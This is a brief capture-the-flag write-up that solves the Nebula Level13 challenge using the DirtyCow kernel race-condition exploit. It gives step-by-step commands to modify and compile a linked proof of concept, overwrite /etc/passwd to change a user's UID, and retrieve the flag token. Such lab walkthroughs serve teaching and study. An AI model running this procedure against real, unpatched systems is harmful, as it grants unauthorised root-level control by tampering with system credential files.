Solving Exploit Exercises Nebula Level13 using DirtyCow
November 08, 2017
When you got nothing better to do
[email protected]:~$ /home/flag13/flag13
Security failure detected. UID 1014 started us, we expect 1000
The system administrators will be notified of this violation
Use this PoC - https://gist.github.com/chriscz/f1aca56cf15cfb7793db0141c15718cd
Modify line 22, 23, 136 as follow:
[email protected]:~$ grep -E "define REPEAT|size <= mmapsize" mucow.c
#define REPEAT 10000 /* 100 */
#define REPEAT_WORD 10000 /* 100 */
//assert(size <= mmapsize);
Compile
[email protected]:~$ gcc -pthread mucow.c -o mucow
Copy and edit /etc/passwd
[email protected]:~$ cp /etc/passwd passwd_new
[email protected]:~$ grep level13 passwd_new
level13:x:1014:1014::/home/level13:/bin/sh
[email protected]:~$ vi passwd_new
[email protected]:~$ grep level13 passwd_new
level13:x:1000:1014::/home/level13:/bin/sh
Run the exploit
[email protected]:~$ ./mucow /etc/passwd < passwd_new
Watch /etc/passwd. Once UID for level13 has change, you can stop.
Logout and login again as user level13
ssh [email protected]
[email protected]'s password:
[email protected]:~$ whoami
nebula
[email protected]:~$ /home/flag13/flag13
your token is b705702b-76a8-42b0-8844-3adabbe5ac58
Yay!